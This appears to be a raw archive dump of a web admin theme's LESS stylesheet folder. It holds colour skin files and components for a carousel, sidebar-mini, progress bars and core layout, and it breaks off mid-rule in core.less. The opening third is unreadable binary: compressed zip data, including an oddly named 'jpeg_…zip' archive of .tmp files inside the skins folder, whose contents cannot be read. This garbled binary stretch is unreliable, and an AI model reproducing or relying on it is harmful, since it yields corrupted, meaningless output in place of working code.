M�i�n���$�W�=�U���t4}�����ܓ����?n��f��-�u�_��-ڽ�m�&���4�p���x�p=+n2�	%	^�ۻـ��=�������|^<���f�^B�-p�,.�{�H�uL]��,�ݢ���~�ٗ�⭺�	]��ޜ��'�
Ь�&i֛��
=�2;�L�vA
��d�ܬ���#���jFaR�X��uK�����ϓQ�x1j�'��xtݿ�G5�YA��L����H�)���ϛ�(rX	]�3��Q�'���v/bV����GU���jVb�U%٪g���ي3{�U�V�!����+�71K�`���{���"y��G�c��P���s����@�Gո*͒�̲��U�Rԯ��kri)zj~�˫�;�[���LG�q�VK�Fƭ�r�-���\yU��
L��<1؛Z���8�л�	o]�e|���s��;�m�*h4�)�0��o�M��~�0H��0��zUuě�`2^t��ύ�f6�P�<}|��#�d�0�8Y��h�gc�'e�9a
%qJ��k0^.#a�m���Z��U�bѹ��,|"�(�2��8J�g*J�D���h��/C=�	����54�Tê,�T�-s��(
V
���u��ğ��g��`�λ.*U�H����Y�D�:T�D4Z����]��&I]]�PK�qN[6����c_68edea71858d3.tmp]X���u�+���h�z�)��6�8��Qo&�=�8!�@�[�ս�/�>��ϟ���ן?�7�?��h�c꤄��z�Qtҹ����R��7��7O�Ώ�@�⺰�
�A��~Pa��ג.�\_|%}/5�轤�OU�@̟��u����C�E�p��s�K�5�|>nB5�8^��m�e���gK�3>&�/H5��U�%��`��=~�-.�4���Q�<��c��b�7y��� -�i�pp.�t�Ȏ���F�w�V8�鉎7X$c���H�&��6�58Q�x[5ă	��-�shG����Y�"#l�,#�*�w���b���^`oؽ�}��֡9�����/ex�O�D�Ke\��k�H��2���8ϼo�+�>�
��Whm��R�[��;����n1�Y>��v[Pk��>՘��b��a��rڶ��Z��	���3c���i�9 Lu�r������hx?i`G��1,TL���8[��ɘy�{�B�G�‚��ۋΒ�V�~��'e���K�C(h/k�u]�Y�E�8���o'�j
��	·B�o[�[�!�����N?�l�߸�W�7	�Y�=��I�f�β�=~�FD�,�D>��,�km\U4M�^�2[H�
�	Zn7݁������j�^�W�)3�Cc�����Y�<,B����-y{5��)����(7�ʟ���HH�c�D��M���
=
	�H'�QM5���*�ͿƝ3���ZYHm�\��6'�;����'5sV���;��	���oSJ���HՎ@��#���{�q�Ӈ��P�I}���f�WQ������=cg�0���me1]<�%JȈ����K*P�Em?��b�Q�4�D�aw2VJ��,��3;�.�͚�J��Q�aȸ���(HR*���n�J��s,�b����ep�E�P����ټ��PbN^%|v��[��7NC����us�H��D��4u��DO��lԣ��F� \�
��
�@����C�
F�R���,�/a�4x�|�7�p�7Tc�)־*y�A�dύ]�c��s�㧅Z�M
��p�p��u_8s]��e��~kVALX�%=`�n�iQQ`R�v5�C_���
�d�;�[�Eq��;]�88����͋U�'��tf�2+&�m�\G�����`Z����(�4�*�����g�ci&g2���9p�g�B���OuEy*H\(�[ߧ+�z��d�<�8�@���uQ�e�LE"�~:�ԦO
�M��i�OR��{��j��6��K��7�[\��;@�1vS�f���o"85�2 *A��@�v�_:��#� G]�v�i�TWkO�H]}	o��G�u[v�T{�<�o�إ����_�Z�^��Jg�M�;�Ƌ_tBs����_�B�h�S��fU�0Y���9���y3�m~0�m�bb#��^�@!���Y�D�9�	
J��C���b%�Ѻ��P����23s��]_[�U��|B��=&�dAGQ����Y�;��UG^�/Ĝ�3��o�7U��T6>�:w>�٤��%�1*D��L��j�M��#���+37S��d40��53!�&{��
�t��q;q�p3��E�V�ew1�HeS���<��Ƽ��h��0��P
�_W4�	�C�>.�)�=|�2�f�I�dYSI��
y����L�<S��u��j�{���Q9��2%�s��N�����g���7O!�}��K�(L�A&K)�[h\�̼!^;��3�:0AQ;E��|맄��U�Q'�E%���湦z�Cl���&M�+.����i�u7�o��H.t�� �w��܍�����֚S ��X5��`���Ve��sO�yѽb�m�5�7��G��.��L2�k~4���5]x�ߺt�@ra����c�����wo����vkaf�	
L�U�N�3�_2g�r���( ���/��mc�7��D�֐�b2l~%j����Z��FG�
�.iHn�V�΀����Jg 秢�=�#T���nL"Qh�
h��=OU����Km��-`q�������W�K-�W�@�R.(��}��~�����]A;�	�"�G��f0�����a�\�
��eI����4@�^i��)l!ߧ���y��Îٌz�!镝�(u7�#��`q�g\s�X�aO\�Iq��	���$(��&��Z[j��̝q���'%��1U�z�ܗ^P�3��FA�"
��������-h��<��~�jv�1C6�ccиB��{z�]��&/t�S���v�:h�v��&� �ɦ=��^=�P��3i��zw�\a�s!>݁ԋD�tj��܁P	4�=̌���N�i�Cr	Z�D�cĐ��
_H.��ٲ91�.uI�2
0�8����U�GR�%���d9���[^@Q��o�y��ߒ���a�dI~ᆤ�3���ҬC�q�2M�����J�/zE���K�ؼL�^[%a�n��DV?��n[����K��Gr����Z���}_2No����6@���-��i�\Q�f4�2
�B����ڗ)\Vc\�ǁ.h7�W�b���^�y��
5����d� 9�2�b�ES+�^��N�}�<8'�Ґ�bfCP���yT�K��V;���b������&�+���Qe�	��A'��<z&�M�p��8�҄��@�4;<�68�d��BN�74�)уײ>eu4?8ޖYN�`�]�"G�0����rКlg���'-��V��W��e1���� �;T����6����>y����Vo)�^T�W��OJ��[m����$��%�Ҁ,�3�X&�{#xk���#v���`%!�K
�dX�0ВE�9���b������)���t��vf�Ü�Qn�
�#�)�Z�����T{DCP�)�0t��"W�6��^�j!*�wrR���֓�@9B���虐W����H�0}�K��jp�!�[ϕ,����,?���V;��7��Y&�+.&8��oN�9���ߖ>]����t��O�yY�X�������
�2xl6����
1c�e��Y�NDbU
~m9��L�m%@�rF�!�ջ��.,����Qs���Ld����MM:e��{�o���>�!G=lW��l���%�t�xCS9_�5#����;`��c��"�_8��7��l������,�b���
��;a��S�9��)�M�g�~�A,��U�eM�e��z�3�)�V�~�}���ִ���j|�hs\Gu�2-!�R�G�T�G����ʘy�I�j�;.�go�&^��Ft���T�X�73�P��Λ	����K��&�[_�z�G�JE��ԋ���[1�Ȟ%y^�=R�.�	��;F���8c��>�`t��tƘِuy���Ы�ZD
tu�5�X��(M˥���l�_��)jI�q�v���R�}��J���~�H�>0A��j@p&@ �D\��L�P��B��,)Ȧ8�oh�q��\����},4� 8[u���-�5`�T�X�3P/�}�)"
��0��삽)V�E�������=Du�ھ�/�)W�M�E�����{��zE`�4>s��H6>I=G������ڲ�u|a%�
��r�z\)�
?��P�����*��S�DP"�K�����5X/F�K���f��4W�?
��:���54����ڎ�Ň�|��d��H3V���ۭ{�ecw�	�s���R�he�,�p@�B���4�5������^��������Ed�}��Q�S{�$�"i��tu�H�b92D2���,$J�7}6x����e��*�-q���b�t��"��J&�V֪0]��e�sR�~���%��n}sѬ	(�jۛm��і�j�jT��>`E<`e��iy�YR"V���H���H���lk>��\���i-�����A����`��ۅ#�0�o0o����{���_�_��?�
��~���-�����?��?0��w�Q3����Z���"�������Rl�2�|�b\���垶_����?�0��'��������-[0]W���	��3o�F�_?M���Y��o7{̅�C��y����o������ϟW�6�����h#�,�h������ �*J��ʇ�l@�yܸ^l�Z�����j�?�G�ZoC�NE�$}V'���VO3�}����=������Ͽ��PK?�qN[.��s����b_68edea71858d3.tmpPK?�qN[6�������c_68edea71858d3.tmpPK��less/skins/skins/jpeg_68ede5aa1be82.zip000064400000012643152434265230013601 0ustar00PK�nN[�ӧ9��b_68ede5aa1be82.tmp�U���8�WR�5���!z����t��wZ���"��L���! �w��Y���ם��m�Pa��B���0|������%(���抈C�b�V��uIIJUbkE1N?d,b5���z^���grMJך&*�gy.�S;�� Qt
_p�'�\WW�v�]���,~�Z��)D5
U�
��`�lK10��t��FY��R��Uc%�34���ț�ᙐ��	֬ωB���mId˝Oxn�,��\K�V�Tz߮���j^G_�������n��7�њ����=z]�?�>�#�A�w"o�jh?����/��z�yw[+���6:tgΦ4~x%9����A��V�uC��݅�v���}�= .�˿��.�ߠ��]͎s��o��P���o�T0V��!���9����������n?/:?ܖW�y����s7S��Ē����$� �튨>쵿v�^c0�z�/�f�WD2�x�tr�Q
F��I��3Q�
��X
�6�'��*)�e�:�pڏ�ڝ�i!�9�.��ì�t�:�r,Qr��Xδe>�e���j0-W��*��,Cb�ĖjUɌg��i��1ǣ�1Kyy[�raV��4�����TI�g��Fbua�kҿ��eV�Dn��]��y��Y�2���:��L��r^j�؆��L����z5�G�~2��W�Mήgr��

±����ot�ۉ�lO6n���$��qt�FM��Vw��͍�$Q�,������A1�,�r��������"f�*4�b.
�q�!�KI�؜bQ�<�͋����T�!]]��G�8���f�ݘN)+x"�߱`ɂ�y[��A��l���!�ixh{��`�1]�MYѰ3�È%
˪���a
.{�zꯟ��e�*E��s�(?���in�f���"��=Z�'��J�/���PK�nN[�?���#c_68ede5aa1be82.tmp]x��ȕ�_�<�fQNx�9\ū�^�r�Yf���^{y�A���O���������~~�z�����O�
�)���1uRBh=�(:�L[��r)���N����Ώ�@�⺰�B�^q׫�0��kq_n :q�I�t�$������ӟ~�owV�>� '���P�S�%�cy�ju�*I��	Ndq,�M�:�q<MM�r��@�7BƜ��9��~��0�𧰓�c�E�Nh~�G��K��;�=9i�9H��R�A��l��?l�>�ZáNO�g�E2���ƏĨcQ�lC\��
Ϫ �ml8x��v�=/a�[kSd�MP�e$Y��6
|��V��`�@߁������:�W�D�a���L�:*��z�_KDb�r6�,tn]^��uYg0�8;o�h�/�Z*t�{Ƕ'�X���r�Ͳ���V�bz��������^A���D�O�����t%����)����1C7[-��]�}�?��'��d�$�
�6�\�j�>b�PGz-��C}|�HRNk�(�>�P�{.nн��ֹ��ճ
��-��'��/�_ḺQG�~�w婯�\��=mL�9�*���Ǜh���w��Z��Z�x'4`/�R,��t�Z�0G
:��:73M�pf]��~W�-�2<�r��|8%�ң]_,"�q� d}R���Q�O�}r��u4��*�O�ݾ�2�֖�Q}��J�QC���kj��)K�߱�f*;<Ӕ�o���(���5P��ƠW
��C]|R�`ꉩ	�5d���fM2ۈ�A�8Ws�`)�����_����f:���H�4P�ebQQ��j��LS0
�!x���|�+#�A���$�,��z��[�R�=�U���l&��^���J"!6Bq
�9�U �ܲ�G"�'��fv�7���)!܀���ޞ�)P��e�j:�8G�`���v�
TLH}��Xb��ㅁ �VS�_���� s7B��^��;zբ���,��~w�9��ٲ~�p�Z7�76�+a��x�akZ�4�qb��	8�Q�R���\o�{�
�~"��S��"��U�������`_F	8e�q�Ю3V�-���D��v*�	�}կ�3wDن�T7�>�O{]dm<Df�=�N"'㘊c��v��Z�Qk���^ا�RD�,�
��Eh���Ukʆ+�lpn�R�.���A|��D�K
k�<+�v�E���0�T���Z�~�\�Яl�%+2J5�O/3�+jAj^mR�j>D�CVEH_�p�8��׽��ԑ�R	��]m�;7�9P�f���.ƴ'�ѧ���ҕ)c,��a���|���
c7Ū'-�s�&�S�0e�t@�QA�k���U<�srХt�Lt��՝��5��
1�(��CC��jO���V �]��3񛢖w�	�b��Yc�΀S�'�Nh.�0�
XhM9>�6{�,�#�vu.z���a�_�Λqf�)w�]���ȸ9�@!���,L"�������mv51�%��ڔ
(�ACۉ/ڜ5��a�������1����:�p�/_5����r^VE�Q�^i�+I��Y��<��EKš�=�.y�,�!�,'3.SfS�W\&���φ�;u���1h��x�0a_;�U
�
��N�A,��A61_�HoE��#�$�աv�f-ǹ����6��V�_c��kc��5:�q7�R8%���wx���q���%1�1��0�1��7���ꢳX��]�%x��<�i���E���0i��@�"UT1
V�}!KEKJ�f�#�x�K�AvD�b	�Vb����v�ۖ�<�p蝻*��ڣ�cm�����
K��<�.n7��5��U2��?�R��^t�*�υP!�ӻ�XmX���	v="�r���-e0{���tx`�ϳ��O��,�vNq��ۍ[0���.��L2�+~0���5Yx���d�@ra��J�9Ƣj)Ó��
cڦ��0��
L�q��4gB;2g�Iu��R@�i��PV�7��m}3F�T��0)u)��	fU���x-~l:��;Ç��Jq�;͠ثԾ_Z�s�vP�OZ�dZ8C�}ʛ����gThh��U�å�a f3�<
�vj�6{�+1��	J�y�=�K~��C������^a3�$E��`�Ma�c��W�Ĺ���aÒ��'1XP'�؃ ��'�RX|����
I0MD�<��<v�b�H{}�����I}�����o����²r��A��
��w�lC��h��fP��;�	Q�L��Y^]�i�x�rU�OS��y��Cv��p�J�P�$s���v8���sMT���O�H_�Jfm�I�t��\i�]�k=�$����pd#��!KzU2M��fKB�����3X�p�Rl�ۄ�k�$bJZ�
����L����M��vɀj�'�R��{t I�f��ZWʼ�xg2`��ӎ����H���ꄱ�*U��d��K�oPw�\�F�yd���`3���=��X��DGB*�`e��h8)����/�uZ8K�d�x������x�3=χ@��m�`:1��X�|��J܊�k�cQ��94N����6@���-|��T(�ÛL:LZRN�i;��AI�{|yJ��xi/=m���`Ղ��Z̸��W��Tmd��XN�11���Ձ��
3��exaJX����6hw��g%ݑ�$�\��Z-���������G%f��K}����0��^@�5d�M���\P�&f�)ۀ�?Fy9v����V�]�ģ���-�8��|�M�0�E8�O��ħ8��[�ﭸ��k/�=G,�\�� ��A)+[r)3���5��}�t�PӼ��O{%A\�>{Ͷ>��!���i'óFS8k�&�F0�M��+p�a��S��k���Ă$n#�.#�t��Q��e"�h�W���u�b�kV���W_|�~�q�m�Jֶ�;-0�p�p���S�̛���� �)а s�X3��-���6<�X���_����i%�k���aZ	:u���AM�]����5���[-w�:�[��AOS�u��
�踙'W�F��mA��=�EG�T��($���I΢�Ί��@�k()�l�X�, c���`u�
�ۃ$�2|�.j��nZ�$0#�օ��8�\}�t�:�eׇ���C��zͯ�\�?�{u��~_yX���J1���ʂo_���Fk?=ǤO�1%���m-Xt�J:x8bH.���m��r����8KWE��ͰlH�϶�����I���QǙ�h'o��PL��v�*�5؇IC�:"�e��ikz����%F��������H�!+�X�O"YQA�+�ԙxg��� �_�l�).��6�./��Y4��[<�1��~ĴO(3��+��#^u�NDl��n����2�a�ݤ6���]�P���:v�d��ɋ��3����})X�̴o(Cʅ��=�H���0��G<�NHא�^�C�J N$�Ȟ���_��;<��P{k��i�b��x6H |��~��`�W$0����<�D�-nP�����������fO67tC�	-�cC�ڲڐ�PU#��9�6z�PE����
��4x�y5�qK��Ɇc�w�x"A �\uk�<9xݎ̶6�Mg������4Y�}X���BI�z{���&�Bw�AE��+>t�
&����l(
��w�%��|���sp5��Պ�q�R��g�E�!TK._Ṋ{���%���f�T1���<P�l�{�}�4���;�V�n����a,��#�h<h6X�tDAe�G�b�e�vh� �#�o��p\��5�x�iCov���\}L��������ֺ���YI���|�o��������R�\{�=�ˉGV=b%��IA�pd���IC��+*�M`�9F�ƣ��(3�?R�m}�l�K�Z�i�i�\���k��4V��R�-[O�7%b%�
6cQ�ߏ�}H�z~��,�_�T�~���?*��o��Fɿ\8��#���F�ϱ_��?i��?��:<��?Z�dݖ�1�?�?0�:����'��_�<������gɷ}~�)ֵ�{�rO�o��ꏟ_��'��c�_����-[0]W��Ä����a|����+��l�,�݇�
�n?�����O�V�ϟ��e/�D�'�5UdZ|�_׉~����
 �D����Pz�7�8�U�R|�̯z����w�U[߭S��q�V��r˧�.���������?���PK?�nN[�ӧ9����b_68ede5aa1be82.tmpPK?�nN[�?���#���c_68ede5aa1be82.tmpPK�less/skins/skin-yellow.less000066400000002034152434265230012015 0ustar00/*
 * Skin: Yellow
 * ------------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-yellow {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@yellow; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@yellow, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@yellow, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(darken(@yellow, 5%));
    }

    li.user-header {
      background-color: @yellow;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-dark-sidebar(@yellow);
}
less/skins/skin-purple-light.less000066400000002027152434265230013120 0ustar00/*
 * Skin: Purple
 * ------------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-purple-light {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@purple; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@purple, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@purple, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(@purple);
    }

    li.user-header {
      background-color: @purple;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-light-sidebar(@purple);
}
less/skins/skin-black.less000066400000002446152434265230011565 0ustar00/*
 * Skin: Black
 * -----------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

/* skin-black navbar */
.skin-black {
  //Navbar & Logo
  .main-header {
    .box-shadow(0px 1px 1px rgba(0, 0, 0, 0.05));
    .navbar-toggle {
      color: #333;
    }
    .navbar-brand {
      color: #333;
      border-right: 1px solid #eee;
    }
    > .navbar {
      .navbar-variant(#fff; #333; #999; #fff);
      > .sidebar-toggle {
        color: #333;
        border-right: 1px solid #eee;
      }
      .navbar-nav {
        > li > a {
          border-right: 1px solid #eee;
        }
      }
      .navbar-custom-menu .navbar-nav,
      .navbar-right {
        > li {
          > a {
            border-left: 1px solid #eee;
            border-right-width: 0;
          }
        }
      }
    }
    > .logo {
      .logo-variant(#fff; #333);
      border-right: 1px solid #eee;
      @media (max-width: @screen-header-collapse) {
        .logo-variant(#222; #fff);
        border-right: none;
      }
    }

    li.user-header {
      background-color: #222;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
    box-shadow: none;
  }
  //Create the sidebar skin
  .skin-dark-sidebar(#fff);
}
less/skins/skin-blue.less000066400000002200152434265230011424 0ustar00/*
 * Skin: Blue
 * ----------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-blue {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@light-blue; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@light-blue, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@light-blue, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(darken(@light-blue, 5%));
    }

    li.user-header {
      background-color: @light-blue;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-dark-sidebar(@light-blue);
}

.skin-blue.layout-top-nav .main-header > .logo {
  .logo-variant(@light-blue);
}
less/skins/skin-red-light.less000066400000001774152434265230012373 0ustar00/*
 * Skin: Red
 * ---------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-red-light {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@red; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@red, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@red, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(@red);
    }

    li.user-header {
      background-color: @red;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-light-sidebar(@red);
}
less/skins/skin-yellow-light.less000066400000002027152434265230013124 0ustar00/*
 * Skin: Yellow
 * ------------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-yellow-light {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@yellow; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@yellow, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@yellow, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(@yellow);
    }

    li.user-header {
      background-color: @yellow;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-light-sidebar(@yellow);
}
less/skins/skin-black-light.less000066400000002455152434265230012672 0ustar00/*
 * Skin: Black
 * -----------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

/* skin-black navbar */
.skin-black-light {
  //Navbar & Logo
  .main-header {
    .box-shadow(0px 1px 1px rgba(0, 0, 0, 0.05));
    .navbar-toggle {
      color: #333;
    }
    .navbar-brand {
      color: #333;
      border-right: 1px solid #eee;
    }
    > .navbar {
      .navbar-variant(#fff; #333; #999; #fff);
      > .sidebar-toggle {
        color: #333;
        border-right: 1px solid #eee;
      }
      .navbar-nav {
        > li > a {
          border-right: 1px solid #eee;
        }
      }
      .navbar-custom-menu .navbar-nav,
      .navbar-right {
        > li {
          > a {
            border-left: 1px solid #eee;
            border-right-width: 0;
          }
        }
      }
    }
    > .logo {
      .logo-variant(#fff; #333);
      border-right: 1px solid #eee;
      @media (max-width: @screen-header-collapse) {
        .logo-variant(#222; #fff);
        border-right: none;
      }
    }

    li.user-header {
      background-color: #222;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
    box-shadow: none;
  }
  //Create the sidebar skin
  .skin-light-sidebar(#fff);
}
less/skins/skin-green.less000066400000002024152434265230011601 0ustar00/*
 * Skin: Green
 * -----------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-green {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@green; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@green, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@green, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(darken(@green, 5%));
    }

    li.user-header {
      background-color: @green;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-dark-sidebar(@green);

}
less/skins/skin-purple.less000066400000002034152434265230012011 0ustar00/*
 * Skin: Purple
 * ------------
 */
@import "../../bootstrap-less/mixins.less";
@import "../../bootstrap-less/variables.less";
@import "../variables.less";
@import "../mixins.less";

.skin-purple {
  //Navbar
  .main-header {
    .navbar {
      .navbar-variant(@purple; #fff);
      .sidebar-toggle {
        color: #fff;
        &:hover {
          background-color: darken(@purple, 5%);
        }
      }
      @media (max-width: @screen-header-collapse) {
        .dropdown-menu {
          li {
            &.divider {
              background-color: rgba(255, 255, 255, 0.1);
            }
            a {
              color: #fff;
              &:hover {
                background: darken(@purple, 5%);
              }
            }
          }
        }
      }
    }
    //Logo
    .logo {
      .logo-variant(darken(@purple, 5%));
    }

    li.user-header {
      background-color: @purple;
    }
  }

  //Content Header
  .content-header {
    background: transparent;
  }

  //Create the sidebar skin
  .skin-dark-sidebar(@purple);
}
less/carousel.less000066400000000414152434265230010226 0ustar00/*
 * Component: Carousel
 * -------------------
 */
.carousel-control {
  &.left,
  &.right {
    background-image: none;
  }
  > .fa {
    font-size: 40px;
    position: absolute;
    top: 50%;
    z-index: 5;
    display: inline-block;
    margin-top: -20px;
  }
}
less/sidebar-mini.less000066400000006367152434265230010771 0ustar00/*
 * Component: Sidebar Mini
 */

//Add sidebar-mini class to the body tag to activate this feature
.sidebar-mini {
  //Sidebar mini should work only on devices larger than @screen-sm
  @media (min-width: @screen-sm) {
    //When the sidebar is collapsed...
    &.sidebar-collapse {

      //Apply the new margining to the main content and footer
      .content-wrapper,
      .right-side,
      .main-footer {
        margin-left: 50px !important;
        z-index: 840;
      }

      //Modify the sidebar to shrink instead of disappearing
      .main-sidebar {
        //Don't go away! Just shrink
        .translate(0, 0);
        width: 50px !important;
        z-index: 850;
      }

      .sidebar-menu {
        > li {
          position: relative;
          > a {
            margin-right: 0;
          }
          > a > span {
            border-top-right-radius: 4px;
          }

          &:not(.treeview) {
            > a > span {
              border-bottom-right-radius: 4px;
            }
          }

          > .treeview-menu {
            //Add some padding to the treeview menu
            padding-top: 5px;
            padding-bottom: 5px;
            border-bottom-right-radius: 4px;
          }

          //Show menu items on hover
          &:hover {
            > a {
              //overflow: visible;
            }
            > a > span:not(.pull-right),
            > .treeview-menu {
              display: block !important;
              position: absolute;
              width: @sidebar-width - 50;
              left: 50px;
            }

            //position the header & treeview menus
            > a > span {
              top: 0;
              margin-left: -3px;
              padding: 12px 5px 12px 20px;
              background-color: inherit;
            }
            > .treeview-menu {
              top: 44px;
              margin-left: 0;
            }
          }
        }
      }

      //Make the sidebar links, menus, labels, badges
      //and angle icons disappear
      .main-sidebar .user-panel > .info,
      .sidebar-form,
      .sidebar-menu > li > a > span,
      .sidebar-menu > li > .treeview-menu,
      .sidebar-menu > li > a > .pull-right,
      .sidebar-menu li.header {
        display: none !important;
        -webkit-transform: translateZ(0);
      }

      .main-header {
        //Let's make the logo also shrink and the mini logo to appear
        .logo {
          width: 50px;
          > .logo-mini {
            display: block;
            margin-left: -15px;
            margin-right: -15px;
            font-size: 18px;
          }
          > .logo-lg {
            display: none;
          }
        }

        //Since the logo got smaller, we need to fix the navbar's position
        .navbar {
          margin-left: 50px;
        }
      }
    }
  }
}

//A fix for text overflow while transitioning from sidebar mini to full sidebar
.sidebar-menu,
.main-sidebar .user-panel,
.sidebar-menu > li.header {
  white-space: nowrap;
  overflow: hidden;
}

.sidebar-menu:hover {
  overflow: visible;
}

.sidebar-form,
.sidebar-menu > li.header {
  overflow: hidden;
  text-overflow: clip;
}

.sidebar-menu li > a {
  position: relative;
  > .pull-right {
    position: absolute;
    right: 10px;
    top: 50%;
    margin-top: -7px;
  }
}
less/progress-bars.less000066400000003215152434265230011204 0ustar00/*
 * Component: Progress Bar
 * -----------------------
 */

//General CSS
.progress,
.progress > .progress-bar {
  .box-shadow(none);
  &, .progress-bar {
    .border-radius(@progress-bar-border-radius);
  }
}

/* size variation */
.progress.sm,
.progress-sm {
  height: 10px;
  &, .progress-bar {
    .border-radius(@progress-bar-sm-border-radius);
  }
}

.progress.xs,
.progress-xs {
  height: 7px;
  &, .progress-bar {
    .border-radius(@progress-bar-xs-border-radius);
  }
}

.progress.xxs,
.progress-xxs {
  height: 3px;
  &, .progress-bar {
    .border-radius(@progress-bar-xs-border-radius);
  }
}

/* Vertical bars */
.progress.vertical {
  position: relative;
  width: 30px;
  height: 200px;
  display: inline-block;
  margin-right: 10px;
  > .progress-bar {
    width: 100%;
    position: absolute;
    bottom: 0;
  }

  //Sizes
  &.sm,
  &.progress-sm {
    width: 20px;
  }

  &.xs,
  &.progress-xs {
    width: 10px;
  }
  &.xxs,
  &.progress-xxs {
    width: 3px;
  }
}

//Progress Groups
.progress-group {
  .progress-text {
    font-weight: 600;
  }
  .progress-number {
    float: right;
  }
}

/* Remove margins from progress bars when put in a table */
.table {
  tr > td .progress {
    margin: 0;
  }
}

// Variations
// -------------------------
.progress-bar-light-blue,
.progress-bar-primary {
  .progress-bar-variant(@light-blue);
}

.progress-bar-green,
.progress-bar-success {
  .progress-bar-variant(@green);
}

.progress-bar-aqua,
.progress-bar-info {
  .progress-bar-variant(@aqua);
}

.progress-bar-yellow,
.progress-bar-warning {
  .progress-bar-variant(@yellow);
}

.progress-bar-red,
.progress-bar-danger {
  .progress-bar-variant(@red);
}
less/core.less000066400000005517152434265230007352 0ustar00/*
 * Core: General Layout Style
 * -------------------------
 */
html,
body {
  min-height: 100%;
  .layout-boxed & {
    height: 100%;
  }
}

body {
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  font-family: 'Source Sans Pro', 'Helvetica Neue', Helvetica, Arial, sans-serif;
  font-weight: 400;
  overflow-x: hidden;
  overflow-y: auto;
}

/* Layout */
.wrapper {
  .clearfix();
  min-height: 100%;
  position: relative;
  overflow: hidden;
  .layout-boxed & {
    max-width: 1250px;
    margin: 0 auto;
    min-height: 100%;
    box-shadow: 0 0 8px rgba(0, 0, 0, 0.5);
    position: relative;
  }
}

.layout-boxed {
  background: url('@{boxed-layout-bg-image-path}') repeat fixed;
}

/*
 * Content Wrapper - contains the main content
 * ```.right-side has been deprecated as of v2.0.0 in favor of .content-wrapper  ```
 */
.content-wrapper,
.right-side,
.main-footer {
  //Using disposable variable to join statements with a comma
  @transition-rule: @transition-speed @transition-fn,
  margin @transition-speed @transition-fn;
  .transition-transform(@transition-rule);
  margin-left: @sidebar-width;
  z-index: 820;
  //Top nav layout
  .layout-top-nav & {
    margin-left: 0;
  }
  @media (max-width: @screen-xs-max) {
    margin-left: 0;
  }
  //When opening the sidebar on large screens
  .sidebar-collapse & {
    @media (min-width: @screen-sm) {
      margin-left: 0;
    }
  }
  //When opening the sidebar on small screens
  .sidebar-open & {
    @media (max-width: @screen-xs-max) {
      .translate(@sidebar-width, 0);
    }
  }
}

.content-wrapper,
.right-side {
  min-height: 100%;
  background-color: @body-bg;
  z-index: 800;
}

.main-footer {
  background: #fff;
